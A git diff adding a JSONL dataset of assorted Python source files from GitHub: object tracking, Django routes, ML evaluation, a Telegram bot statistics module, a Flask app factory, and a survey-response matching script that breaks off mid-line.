diff --git "a/3238.jsonl" "b/3238.jsonl" new file mode 100644--- /dev/null +++ "b/3238.jsonl" @@ -0,0 +1,539 @@ +{"seq_id":"4351672916","text":"#! /usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division, print_function, absolute_import\nimport os\nimport datetime\nfrom timeit import time\nimport warnings\nimport cv2\nimport numpy as np\nimport argparse\nfrom PIL import Image\nfrom yolo import YOLO\nfrom deep_sort import preprocessing\nfrom deep_sort import nn_matching\nfrom deep_sort.detection import Detection\nfrom deep_sort.tracker import Tracker\nfrom tools import generate_detections as gdet\nfrom deep_sort.detection import Detection as ddet\nfrom collections import deque\nfrom keras import backend\nfrom scipy import integrate\nimport matplotlib.pyplot as plt\nfrom getCorrectImage import viewplot,blankImage,discalculation\n\nbackend.clear_session()\nap = argparse.ArgumentParser()\n# ap.add_argument(\"-i\", \"--input\", help=\"path to input video\", default=\"./test_video/test_1.mp4\")\nap.add_argument(\"-i\", \"--input\", help=\"path to input video\", default=\"./MPE_data/OneDrive_2021-08-27/MPE pre-employment aptitude test cv/images/left/frame%05d.jpg\")\nap.add_argument(\"-c\", \"--class\", help=\"name of class\", default=[\"person\", \"car\",\"bus\",\"truck\",\"train\"])\nargs = vars(ap.parse_args())\n\npts = [deque(maxlen=30) for _ in range(9999)]\nwarnings.filterwarnings('ignore')\n\n# initialize a list of colors to represent each possible class label\nnp.random.seed(100)\nCOLORS = np.random.randint(0, 255, size=(200, 3),\n dtype=\"uint8\")\n\n\ndef main(yolo):\n start = time.time()\n # Definition of the parameters\n max_cosine_distance = 0.5 # 余弦距离的控制阈值\n nn_budget = None\n nms_max_overlap = 0.3 # 非极大抑制的阈值\n\n counter = []\n # deep_sort\n model_filename = 'model_data/market1501.pb'\n encoder = gdet.create_box_encoder(model_filename, batch_size=1)\n\n metric = nn_matching.NearestNeighborDistanceMetric(\"cosine\", max_cosine_distance, nn_budget)\n tracker = Tracker(metric)\n\n writeVideo_flag = True\n # video_path = \"./output/output.avi\"\n video_captureL = cv2.VideoCapture(args[\"input\"])\n video_captureR = cv2.VideoCapture(\"./MPE_data/OneDrive_2021-08-27/MPE pre-employment aptitude test cv/images/right/frame%05d.jpg\")\n \n\n if writeVideo_flag:\n # Define the codec and create VideoWriter object\n w = int(video_captureL.get(3))\n h = int(video_captureL.get(4))\n fourcc = cv2.VideoWriter_fourcc(*'MJPG')\n out = cv2.VideoWriter('./output/output_1.avi', fourcc, 15, (w, h))\n list_file = open('detection.txt', 'w')\n frame_index = -1\n\n fps = 0.0\n img_count = 0\n\n while True:\n\n retL, frame = video_captureL.read() # frame shape 640*480*3\n retR,frameR = video_captureR.read() \n if retL != True:\n break\n t1 = time.time()\n\n imageL = Image.fromarray(frame)\n imageR = Image.fromarray(frameR)\n # imageL = Image.fromarray(frame[..., ::-1])\n # imageR = Image.fromarray(frameR[..., ::-1])\n \n imgl = cv2.cvtColor(np.asarray(imageL),cv2.COLOR_RGB2BGR) \n imgr = cv2.cvtColor(np.asarray(imageR),cv2.COLOR_RGB2BGR) \n\n depth_map = discalculation(imgl,imgr)\n # image = Image.fromarray(frame[..., ::-1]) # bgr to rgb\n boxs, class_names = yolo.detect_image(imageL)\n img_count += 1\n \n\n features = encoder(frame, boxs)\n # score to 1.0 here).\n detections = [Detection(bbox, 1.0, feature) for bbox, feature in zip(boxs, features)]\n # Run non-maxima suppression.\n boxes = np.array([d.tlwh for d in detections])\n scores = np.array([d.confidence for d in detections])\n 
indices = preprocessing.non_max_suppression(boxes, nms_max_overlap, scores)\n detections = [detections[i] for i in indices]\n \n # create view image\n img_view = blankImage(200, 200)\n # Call the tracker\n tracker.predict()\n tracker.update(detections)\n\n i = int(0)\n indexIDs = []\n c = []\n boxes = []\n if len(class_names) > 1:\n k = len(class_names) - 1\n for det in detections:\n bbox = det.to_tlbr()\n if k >= 0:\n cv2.putText(frame, str(class_names[k][0]), (int(bbox[0] + 10), int(bbox[1] - 20)), 0, 5e-3 * 100, (225,255,255), 2)\n k -= 1\n #cv2.rectangle(frame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), (255, 255, 255), 2)\n \n for track in tracker.tracks:\n if not track.is_confirmed() or track.time_since_update > 1:\n continue\n # boxes.append([track[0], track[1], track[2], track[3]])\n indexIDs.append(int(track.track_id))\n counter.append(int(track.track_id))\n bbox = track.to_tlbr()\n color = [int(c) for c in COLORS[indexIDs[i] % len(COLORS)]]\n\n cv2.rectangle(frame, (int(bbox[0]), int(bbox[1])), (int(bbox[2]), int(bbox[3])), (color), 3)\n cv2.putText(frame, str(track.track_id), (int(bbox[0]), int(bbox[1] - 20)), 0, 5e-3 * 120, (color), 2)\n \n \n i += 1\n # bbox_center_point(x,y)\n center = (int(((bbox[0]) + (bbox[2])) / 2), int(((bbox[1]) + (bbox[3])) / 2))\n\n # calculate the average distance \n dis_all = depth_map[int(bbox[1]):int(bbox[3]),int(bbox[0]):int(bbox[2])]\n dis_all = dis_all.flatten()\n dis_all.sort()\n dis_sort = [k for k in dis_all if k != 0]\n start = int(len(dis_sort)*0.25)\n ave_dis = np.mean(dis_sort[start:-start])\n \n cv2.putText(frame, str(round(ave_dis,2)) + 'm', (int(bbox[0]), int(bbox[1] - 5)), 0, 5e-3 * 100, (225,0,0), 2)\n \n # create Aerial View\n viewplot(center[0],center[1],ave_dis,200,200,img_view)\n \n \n # # track_id[center]\n # pts[track.track_id].append(center)\n # thickness = 3\n # # center point\n # cv2.circle(frame, (center), 1, color, thickness)\n\n # # draw motion path\n # for j in range(1, len(pts[track.track_id])):\n # if pts[track.track_id][j - 1] is None or pts[track.track_id][j] is None:\n # continue\n # thickness = int(np.sqrt(64 / float(j + 1)) * 2)\n # cv2.line(frame, (pts[track.track_id][j - 1]), (pts[track.track_id][j]), (color), thickness)\n\n plt.imshow(img_view)\n plt.imsave(\"./view_images/view\" +str(img_count) + '.jpg', img_view)\n count = len(set(counter))\n cv2.putText(frame, \"Total Object Counter: \" + str(count), (int(20), int(120)), 0, 5e-3 * 200, (0, 255, 0), 2)\n cv2.putText(frame, \"Current Object Counter: \" + str(i), (int(20), int(80)), 0, 5e-3 * 200, (0, 255, 0), 2)\n cv2.putText(frame, \"FPS: %f\" % (fps), (int(20), int(40)), 0, 5e-3 * 200, (0, 255, 0), 3)\n cv2.namedWindow(\"YOLO3_Deep_SORT\", 0)\n cv2.resizeWindow('YOLO3_Deep_SORT', 1024, 768)\n cv2.imshow('YOLO3_Deep_SORT', frame)\n cv2.imwrite(\"./out_images/output\" +str(img_count) + '.jpg', frame)\n\n if writeVideo_flag:\n # save a frame\n out.write(frame)\n frame_index = frame_index + 1\n list_file.write(str(frame_index) + ' ')\n if len(boxs) != 0:\n for i in range(0, len(boxs)):\n list_file.write(\n str(boxs[i][0]) + ' ' + str(boxs[i][1]) + ' ' + str(boxs[i][2]) + ' ' + str(boxs[i][3]) + ' ')\n list_file.write('\\n')\n fps = (fps + (1. 
/ (time.time() - t1))) / 2\n # print(set(counter))\n\n # Press Q to stop!\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n print(\" \")\n print(\"[Finish]\")\n end = time.time()\n\n # if len(pts[track.track_id]) != None:\n # print(args[\"input\"][43:57] + \": \" + str(count) + \" \" + str(class_name) + ' Found')\n\n # else:\n # print(\"[No Found]\")\n\n video_captureL.release()\n\n if writeVideo_flag:\n out.release()\n list_file.close()\n cv2.destroyAllWindows()\n\n\nif __name__ == '__main__':\n main(YOLO())\n","repo_name":"HanRunbing/object-tracking","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"4225786206","text":"\nfrom django.urls import path\nfrom vsview.views import AboutPageView, HomePageView, plipListPageView\n\n\nurlpatterns = [\n path('', HomePageView.as_view(), name='home'),\n path('plip', plipListPageView, name='plip_list'),\n path('about/', AboutPageView.as_view(), name='about')\n]\n","repo_name":"xxtucamarxx/lambda-web-project","sub_path":"lambda_project/vsview/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":284,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21182031821","text":"# -------------------------------\n# -- Basic User Function Tags ---\n# -------------------------------\n\nUNSET_TAG = 0\n\n# When received by a worker, tells worker to do a sim eval;\n# When received by the manager, tells manager that worker is done with sim eval.\nEVAL_SIM_TAG = 1\n\n# When received by a worker, tells worker to do a gen eval;\n# When received by the manager, tells manager that worker is done with sim eval.\nEVAL_GEN_TAG = 2\n\nSTOP_TAG = 3 # Manager tells worker (or persistent user_f) to stop\nPERSIS_STOP = 4 # Manager tells persistent user_f to stop\n\n# last_message_number_rst_tag\n\ncalc_type_strings = {\n EVAL_SIM_TAG: \"sim\",\n EVAL_GEN_TAG: \"gen\",\n PERSIS_STOP: \"STOP with work\",\n None: \"No type set\",\n}\n\n# --------------------------------------\n# -- Calculation Status/Signal Tags ----\n# --------------------------------------\n\n# first_calc_status_rst_tag\nFINISHED_PERSISTENT_SIM_TAG = 11 # tells manager sim_f done persistent mode\nFINISHED_PERSISTENT_GEN_TAG = 12 # tells manager gen_f done persistent mode\nMAN_SIGNAL_FINISH = 20 # Kill tasks and shutdown worker\nMAN_SIGNAL_KILL = 21 # Kill running task - but don't stop worker\nWORKER_KILL = 30 # Worker kills not covered by a more specific case\nWORKER_KILL_ON_ERR = 31 # Worker killed due to an error in results\nWORKER_KILL_ON_TIMEOUT = 32 # Worker killed on timeout\nTASK_FAILED = 33 # Calc had tasks that failed\nWORKER_DONE = 34 # Calculation was successful\n# last_calc_status_rst_tag\nCALC_EXCEPTION = 35 # Reserved: Automatically used if user_f raised an exception\n\nMAN_KILL_SIGNALS = [MAN_SIGNAL_FINISH, MAN_SIGNAL_KILL]\n\ncalc_status_strings = {\n UNSET_TAG: \"Not set\",\n FINISHED_PERSISTENT_SIM_TAG: \"Persis sim finished\",\n FINISHED_PERSISTENT_GEN_TAG: \"Persis gen finished\",\n MAN_SIGNAL_FINISH: \"Manager killed on finish\",\n MAN_SIGNAL_KILL: \"Manager killed task\",\n WORKER_KILL_ON_ERR: \"Worker killed task on Error\",\n WORKER_KILL_ON_TIMEOUT: \"Worker killed task on Timeout\",\n WORKER_KILL: \"Worker killed\",\n TASK_FAILED: \"Task Failed\",\n WORKER_DONE: \"Completed\",\n CALC_EXCEPTION: \"Exception occurred\",\n None: \"Unknown Status\",\n}\n# 
last_calc_status_string_rst_tag\n","repo_name":"Libensemble/libensemble","sub_path":"libensemble/message_numbers.py","file_name":"message_numbers.py","file_ext":"py","file_size_in_byte":2188,"program_lang":"python","lang":"en","doc_type":"code","stars":54,"dataset":"github-code","pt":"3"} +{"seq_id":"4891671420","text":"import torch, sys\nfrom torch.utils.data import DataLoader\nfrom torch.utils.data import Subset\nimport torch.nn.functional as F\nfrom funcy import chunks\nfrom sklearn import metrics\nfrom utils.text_loader import load_vocabs\nfrom utils.image_loader import load_image_dataset\nfrom utils.helper import AverageMeter, accuracy\nfrom models.templates import prompts, generate_texts\nimport configs\nfrom tqdm import tqdm\nimport numpy as np\n\n\ndef load_label_embs(model, lang, langs, word_data, data_mode, num_prompts):\n vocab = load_vocabs(lang, langs, word_data, data_mode)\n texts = generate_texts(prompts[word_data][lang], vocab, k=num_prompts)\n K = num_prompts\n text_embeddings = []\n for batch_texts in tqdm(chunks(128*K, texts)):\n with torch.no_grad():\n batch_txt_embs = model.encode_text(batch_texts)\n # ensemble\n batch_size = len(batch_texts) // K\n batch_txt_embs = batch_txt_embs.view(batch_size, K, batch_txt_embs.shape[-1])\n batch_txt_embs = batch_txt_embs.mean(dim=1)\n # normalize after averaging\n batch_txt_embs = F.normalize(batch_txt_embs, dim=-1)\n text_embeddings.append(batch_txt_embs)\n text_embeddings = torch.cat(text_embeddings, dim=0)\n return text_embeddings\n \ndef validate(model, text_embeddings, dataloader, device, logit_scale=1.0):\n text_embeddings = text_embeddings.type(torch.FloatTensor).to(device)\n tqdm_object = tqdm(dataloader, total=len(dataloader))\n top5, top1 = AverageMeter(), AverageMeter()\n for (images, labels) in tqdm_object:\n # print(batch_idx)\n labels = labels.long().to(device)\n with torch.no_grad():\n image_embeddings = model.encode_image(images.to(device))\n image_embeddings = image_embeddings.type(torch.FloatTensor).to(device)\n image_embeddings = F.normalize(image_embeddings, dim=-1)\n logits = image_embeddings @ text_embeddings.T * logit_scale\n _, pred = logits.topk(1, 1, True, True)\n pred = pred.t()\n precs = accuracy(logits, labels, topk=(1, 5))\n top1.update(precs[0].item(), images.size(0))\n top5.update(precs[1].item(), images.size(0))\n tqdm_object.set_postfix(top1_acc=top1.avg)\n torch.cuda.empty_cache()\n\n print(\"Classification on\", top1.avg, top5.avg)\n return top1.avg, top5.avg\n\n\n\n\ndef evaluate_multilabel_classification(image_data, lang, opts):\n loss = torch.nn.MultiLabelSoftMarginLoss()\n model, text_embeddings, dataloader = load_image_and_class(image_data, lang, opts, multilabel=True)\n tqdm_object = tqdm(dataloader, total=len(dataloader))\n model.eval()\n\n total = 0\n num_examples = 0\n \n gts = {i:[] for i in range(0, configs.num_classes[image_data])}\n preds = {i:[] for i in range(0, configs.num_classes[image_data])}\n with torch.no_grad():\n for (images, labels) in tqdm_object:\n labels = labels.long().to(opts.device)\n images = images.to(opts.device)\n image_features = model.image_encoder(images)\n image_embeddings = model.image_projection(image_features)\n image_embeddings = F.normalize(image_embeddings, dim=-1)\n logits = image_embeddings @ text_embeddings.T * np.exp(model.temperature)\n l = loss(logits, labels).item()\n total += l\n num_examples += image_features.size()[0]\n output = torch.sigmoid(logits)\n pred = output.squeeze().data.cpu().numpy()\n gt = labels.squeeze().data.cpu().numpy()\n for 
label in range(0, configs.num_classes[image_data]):\n gts[label].extend(gt[:,label])\n preds[label].extend(pred[:,label])\n\n print(\"Average Multilabel Loss is: {}\".format(total/num_examples))\n \n FinalMAPs = []\n for i in range(0, configs.num_classes[image_data]):\n precision, recall, _ = metrics.precision_recall_curve(gts[i], preds[i])\n FinalMAPs.append(metrics.auc(recall, precision))\n\n # Print AUC for each class\n indices = [i for i in range(configs.num_classes[image_data])]\n indices = sorted(indices, key = lambda x: FinalMAPs[x])\n with open(\"../results/AUC.txt\", \"w\") as f:\n for idx in indices:\n f.write(\"{}: {}\\n\".format(idx, FinalMAPs[idx]))\n \n return FinalMAPs\n\n","repo_name":"UW-Madison-Lee-Lab/walip","sub_path":"src/tclip/clip_ops.py","file_name":"clip_ops.py","file_ext":"py","file_size_in_byte":4333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"70717939923","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n # path(\"\", views.index, name=\"index\"),\n # path(\"genre/\", views.view_genre, name=\"index\"),\n # path(\"movie/\", views.view_movie, name=\"index\"),\n path(\"\", views.index, name=\"index\"),\n path(\"search\", views.SearchView.as_view(), name=\"search\"),\n path(\"genre/\", views.GenreView.as_view(), name=\"genre\"),\n path(\"movie/\", views.MovieView.as_view(), name=\"movie\"),\n path(\"register\", views.register_request, name=\"register\"),\n path(\"login\", views.login_request, name=\"login\"),\n path(\"logout\", views.logout_request, name=\"logout\"),\n path(\"rated\", views.RatedView.as_view(), name=\"rated\"),\n path(\"search\", views.search_movies, name=\"search_movies\"),\n path('rate_movie/', views.rate_movie, name='rate_movie'),\n path('add_comment/', views.add_comment, name='add_comment'),\n path('movie//edit/', views.MovieEditView.as_view(), name='movie_edit'),\n path('movie_add', views.movie_add, name='movie_add'),\n path('movie//add_image/', views.add_image, name='add_image'),\n path('video', views.video.as_view(), name='video'),\n path(\"videopage/\", views.VideoPage.as_view(), name=\"videopage\"),\n]","repo_name":"Dezert01/adv","sub_path":"django-tutorial-koziol/venv/Scripts/movielens/userview/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"27275858289","text":"from db.base import Session\n\nfrom db.devotional import Devotional\nfrom db.subscriber import Subscriber\nfrom db.subscription import Subscription\nfrom db.statistics import Statistics\n\nfrom utils.consts import STATISTICS_UNIQUE_ID\nfrom utils.utils import get_epoch\nimport utils.consts as consts\n\ndef subscribers():\n session = Session()\n count = session.query(Subscriber).count()\n session.close()\n return count\n\ndef subscriptions():\n session = Session()\n count = session.query(Subscription).count()\n session.close()\n return count\n\ndef geo_skipped():\n session = Session()\n count = session.query(Subscriber).filter(Subscriber.time_zone == 'skipped').count()\n session.close()\n return count\n\ndef subscriptions_by_material():\n sbd = {}\n session = Session()\n for subscription_title in consts.DEVOTIONALS_KEYBOARD:\n subscription_title = subscription_title[0]\n sbd[subscription_title] = session.query(Subscription).filter(Subscription.title == subscription_title).count()\n session.close()\n return sbd\n\ndef statistics_setup():\n session = 
Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n if stats == None:\n session.add(Statistics())\n session.commit()\n session.close()\n\ndef statistics():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n session.close()\n return stats\n\ndef set_last_registered():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.last_registered = get_epoch()\n session.commit()\n session.close()\n\ndef set_last_subscribed():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.last_subscribed = get_epoch()\n session.commit()\n session.close()\n\ndef add_sent(tosum=1):\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.sent += tosum\n session.commit()\n session.close()\n\ndef add_unsubscribed():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.unsubscribed += 1\n session.commit()\n session.close()\n\ndef add_quiz():\n session = Session()\n stats = session.query(Statistics).get(STATISTICS_UNIQUE_ID)\n stats.quizzes += 1\n session.commit()\n session.close()\n\nstatistics_setup()","repo_name":"rykovv/devotional-telegram-bot","sub_path":"actors/actuary.py","file_name":"actuary.py","file_ext":"py","file_size_in_byte":2353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"14746163781","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import path\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom . import views\n\nurlpatterns = [\n path('become-vendor/', views.become_vendor, name='become_vendor'),\n path('vendor-admin/', views.vendor_admin, name='vendor_admin'),\n path('vendor-order/', views.order, name='vendor_order'),\n path('add-product/', views.add_product, name='add_product'),\n path('edit-product//', views.edit_product, name='edit_product'),\n path('edit-order//', views.edit_order, name='edit_order'),\n path('update-vendor/', views.update_vendor, name='update_vendor'),\n path('vendor-account', views.vendor_account, name='vendor_account' ),\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n path('login/', auth_views.LoginView.as_view(template_name='vendor/login.html'), name='vendor_login'),\n path('', views.vendors, name='vendors'),\n \n path('/', views.vendor, name='vendor'),\n]\n\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)","repo_name":"choudhary2001/ecommerce","sub_path":"vendor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"39357522375","text":"# -*- coding: utf-8 -*-\nimport io\nimport os\nimport sys\nimport logging\nfrom pathlib import Path\n\nfrom flask import Flask\nfrom yaml import load as yload\n\nfrom api_li3ds.app import api, init_apis\nfrom api_li3ds.database import Database\n\n__version__ = '0.1.dev0'\n\n\nLOG_LEVELS = {\n 'debug': logging.DEBUG,\n 'info': logging.INFO,\n 'warning': logging.WARNING,\n 'error': logging.ERROR,\n 'critical': logging.CRITICAL\n}\n\n\ndef load_yaml_config(filename):\n \"\"\"\n Open Yaml file, load content for flask config and returns it as a python dict\n \"\"\"\n content = io.open(filename, 'r').read()\n return yload(content).get('flask', {})\n\n\ndef create_app():\n \"\"\"\n Creates application.\n\n :returns: flask 
application instance\n \"\"\"\n app = Flask(__name__)\n cfgfile = os.environ.get('API_LI3DS_SETTINGS')\n if cfgfile:\n app.config.update(load_yaml_config(cfgfile))\n else:\n try:\n cfgfile = (Path(__file__).parent.parent / 'conf' / 'api_li3ds.yml').resolve()\n except FileNotFoundError:\n print(Path(__file__).parent.parent / 'conf' / 'api_li3ds.yml')\n app.logger.warning('no config file found !!')\n sys.exit(1)\n app.config.update(load_yaml_config(str(cfgfile)))\n\n # setting log level\n if app.config['DEBUG']:\n app.logger.setLevel(LOG_LEVELS['debug'])\n else:\n app.logger.setLevel(LOG_LEVELS['info'])\n\n app.logger.debug('loading config from {}'.format(cfgfile))\n\n if 'HEADER_API_KEY' not in app.config:\n app.logger.fatal('HEADER_API_KEY missing')\n sys.exit(1)\n\n if not app.config['HEADER_API_KEY'] or len(app.config['HEADER_API_KEY']) < 12:\n app.logger.fatal('HEADER_API_KEY cannot be empty or '\n 'too short (at least 12 characters)')\n sys.exit(1)\n\n # load extensions\n # be carefull to load apis before blueprint !\n init_apis()\n api.init_app(app)\n Database.init_app(app)\n return app\n","repo_name":"LI3DS/api-li3ds","sub_path":"api_li3ds/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41904088962","text":"# placeholder added reisitance prediciton model code\n\nimport pandas as pd\n\nimport matplotlib\nmatplotlib.use('TkAgg')\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom sklearn import linear_model\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import mean_absolute_error, mean_squared_error, r2_score\n\n#from sklearn.externals import joblib\n\ndf = pd.read_csv(\"dataset1.csv\")\n\n#preprocessing\ndf = df.dropna( axis=0, how =\"any\")\n\n#print(df.info())\n\ndf_X = df.drop([\"time\",\"label\"], axis=1)\ndf_Y = df[\"label\"]\n\n#split for training\nX_train, X_test, Y_train, Y_test = train_test_split( df_X, df_Y, test_size=0.20, random_state=42)\n\n# train model\nregr = linear_model.LinearRegression()\nregr.fit(X_train, Y_train)\n\n#joblib.dump(regr, 'lin_regr_model_pad.pkl')\n\n#predict results\nY_pred = regr.predict(X_test)\n\n#evaluate model\nr2 = r2_score(Y_test, Y_pred)\nmse = mean_squared_error(Y_test, Y_pred)\nmae = mean_absolute_error(Y_test, Y_pred)\n\nprint(\"mean absolute error: {:.5f}, mean squared error: {:.5f}, r2 score: {:.5f}\".format(mae,mse,r2)) # '0.20'\n\n# # Plot outputs\nplt.scatter(np.arange(X_test.__len__()), Y_test, color='black')\nplt.plot(np.arange(X_test.__len__()), Y_pred, color='blue', linewidth=2)\n\nplt.xticks(())\nplt.yticks(())\n\nplt.show()","repo_name":"dolittle-casestudies/ocfev","sub_path":"model/predict_added_resistance.py","file_name":"predict_added_resistance.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"32052663290","text":"# first machine learning study\n# this code is a reproduction of this one https://www.youtube.com/watch?v=i_LwzRVP7bg\n# I reproduced it only for a first study\n\nimport numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\nimport os\n\n# get the absolute path of the current script\nscript_path = os.path.dirname(os.path.abspath(__file__))\nfile_path = os.path.join(script_path, \"magic04.csv\")\n\n# add header\ncols = [\"fLength\", \"fWidth\", \"fSize\", \"fConc\", \"fConc1\", \"fAsym\", \"fM3Long\", \"fM3Trans\", 
\"fAlpha\", \"fDist\", \"class\"]\n\ndf = pd.read_csv(file_path, names=cols)\ndf[\"class\"] = (df[\"class\"] == \"g\").astype(int)\nprint(df.head())\n\nfor label in cols[:-1]:\n plt.hist(df[df[\"class\"] == 1][label], color = 'blue', label='gamma', alpha=0.7, density=True)\n plt.hist(df[df[\"class\"] == 0][label], color = 'red', label='hadron', alpha=0.7, density=True)\n plt.title(label)\n plt.ylabel(\"Probability\")\n plt.xlabel(label)\n plt.legend()\n plt.show()\n \n# train, validation and test datasets\ntrain, valid, test = np.split(df.sample(frac=1), [int(0.6*len(df)), int(0.8*len(df))])\n\n# to be completed...\n","repo_name":"yannawr/Python-Studies","sub_path":"Machine Learning/machineLearning.py","file_name":"machineLearning.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"36640999054","text":"import pandas as pd\nimport numpy as np\n\n#Display all the columns\npd.set_option(\"display.max_columns\", 100)\n\n#Read in the data sheet named 'Tik_Tok.csv'\ndf = pd.read_csv ('Tik_Tok.csv')\n\n#add a position column\ndf['Position'] = df.index.values + 1\n\n#Rename the columns because the original names are too long to work with\n# pc = preferred way of contact\n# c = Contact\n# PG = preferred gender\n\ndf.columns = ['Timestamp', 'Name', 'Age', 'Gender', 'PG', 'C', 'Email', 'Position']\n\n#This code was not needed\n\nNames = df['Name']\nAges = df['Age']\nGenders = df['Gender']\nGenderP = df['GP']\nContactP = df['PC']\nContactInfo = df['C']\nEmail = df['Email']\nPosition = df['Position']\n\nclass Player(object):\n def __init__(self,name, age, gender, genderp, contactway, contact, email, position):\n self.name = name\n self.age = age\n self.gender = gender\n self.genderp = genderp\n self.contactway = contactway\n self.contact = contact\n self.email = email\n self.position = position\n\nfor person in df:\n players = Player(Names, Ages, Genders, GenderP, ContactP, ContactInfo, Email, Position)\n\n\ndf_under_18 = df[df['Age'] < 18]\n\n#Under 18 Male and Female filter\ndf_M_under_18 = df_under_18[df_under_18['Gender'] == 'Male']\ndf_F_under_18 = df_under_18[df_under_18['Gender'] == 'Female']\n\n\n'''------------------------------Same Gender under 18-----------------------------'''\n\n#Under 18 Males that prefer Males\ndf_M_under_18_PM = df_M_under_18[df_M_under_18['PG'] == 'Male']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_M_under_PM = {}\nk = 0\n\nwhile len(df_M_under_18_PM) > 1:\n\n df_M_under_18_PM.reset_index(drop=True, inplace=True)\n dic_M_under_PM[\"Match_M_under_PM{0}\".format(k)] = df_M_under_18_PM.iloc[:2]\n\n df_M_under_18_PM.reset_index(drop=True, inplace=True)\n df_M_under_18_PM = df_M_under_18_PM.drop([df_M_under_18_PM.index[0], df_M_under_18_PM.index[1]])\n\n k += 1\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n#Under 18 females that Prefer Females\ndf_F_under_18_PF = df_F_under_18[df_F_under_18['PG'] == 'Female']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_F_under_PF = {}\nk = 0\nwhile len(df_F_under_18_PF) > 1:\n\n df_F_under_18_PF.reset_index(drop=True, inplace=True)\n dic_F_under_PF[\"Match_F_under_PF{0}\".format(k)] = df_F_under_18_PF.iloc[:2]\n\n df_F_under_18_PF.reset_index(drop=True, inplace=True)\n df_F_under_18_PF = df_F_under_18_PF.drop([df_F_under_18_PF.index[0], df_F_under_18_PF.index[1]])\n\n k += 
1\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n'''------------------------------Opposite Gender under 18-----------------------------'''\n\n#Under 18 Males that prefer Females\ndf_M_under_18_PF = df_M_under_18[df_M_under_18['PG'] == 'Female']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n#Under 18 Females that prefer Males\ndf_F_under_18_PM = df_F_under_18[df_F_under_18['PG'] == 'Male']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_MF_under_PFM = {}\nk = 0\nwhile len(df_M_under_18_PF) > 1 and len(df_F_under_18_PM) > 1:\n    df_M_under_18_PF.reset_index(drop=True, inplace=True)\n    df_F_under_18_PM.reset_index(drop=True, inplace=True)\n\n    dic_MF_under_PFM[\"Match_MF_under_PFM{0}\".format(k)] = [df_M_under_18_PF.iloc[:1], df_F_under_18_PM.iloc[:1]]\n\n    df_M_under_18_PF.reset_index(drop=True, inplace=True)\n    df_F_under_18_PM.reset_index(drop=True, inplace=True)\n\n    df_M_under_18_PF = df_M_under_18_PF.drop([df_M_under_18_PF.index[0]])\n    df_F_under_18_PM = df_F_under_18_PM.drop([df_F_under_18_PM.index[0]])\n\n    k += 1\n\n#^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n\n\n'''-----------------------------------Either under 18-------------------------------------------'''\n\n\ndf_E_under_18_PE = df_under_18[df_under_18['PG'] == 'Either']\n#VVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVVV\ndic_E_under_PE = {}\nk = 0\n\nwhile len(df_E_under_18_PE) > 1:\n\n    df_E_under_18_PE.reset_index(drop=True, inplace=True)\n    dic_E_under_PE[\"Match_E_under_PE{0}\".format(k)] = df_E_under_18_PE.iloc[:2]\n\n    df_E_under_18_PE.reset_index(drop=True, inplace=True)\n    df_E_under_18_PE = df_E_under_18_PE.drop([df_E_under_18_PE.index[0], df_E_under_18_PE.index[1]])\n\n    k += 